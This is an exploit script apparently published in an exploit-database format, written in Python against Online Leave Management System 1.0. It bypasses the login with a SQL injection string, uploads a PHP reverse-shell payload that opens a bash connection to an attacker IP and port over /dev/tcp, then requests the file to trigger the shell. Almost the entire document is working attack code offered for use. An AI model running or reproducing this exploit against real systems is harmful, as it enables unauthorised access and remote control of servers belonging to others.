# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 24-08-2021 # Exploit Author: Justin White # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html # Version: V1 # Category: Webapps # Tested on: Linux #!/bin/env python3 import requests import time import sys from colorama import Fore, Style if len(sys.argv) != 4: print('python3 script.py <target url> <attacker ip> <attacker port>') print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444') exit() else: try: url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] print() print('[*] Trying to login...') time.sleep(1) login = url + '/classes/Login.php?f=login' payload_name = "reverse_shell.php" payload_file = r"""<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port) session = requests.session() post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() if user_login.text == '{"status":"success"}': print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!') upload_url = url + "/classes/Users.php?f=save" cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"} data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n" print('[*] Trying to Upload Reverse Shell...') time.sleep(2) try: print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!') upload = session.post(upload_url, headers=headers, cookies=cookie, data=data) upload_check = f'{url}/uploads' r = requests.get(upload_check) if payload_name in r.text: payloads = r.text.split('<a href="') for load in payloads: if payload_name in load: payload = load.split('"') payload = payload[0] else: pass else: exit() except: print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Upload failed try again in a little bit!!!!!!\n') exit() try: print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Check Your Listener!\n') connect_url = url + '/uploads/' r = requests.get(connect_url + payload) except: print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + f' Failed to find reverse shell check {connect_url} or try again!\n') else: print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Login failed!\n') except: print('[' + Fore.YELLOW + '!' + Style.RESET_ALL + ']' + ' Something Went Wrong!\n')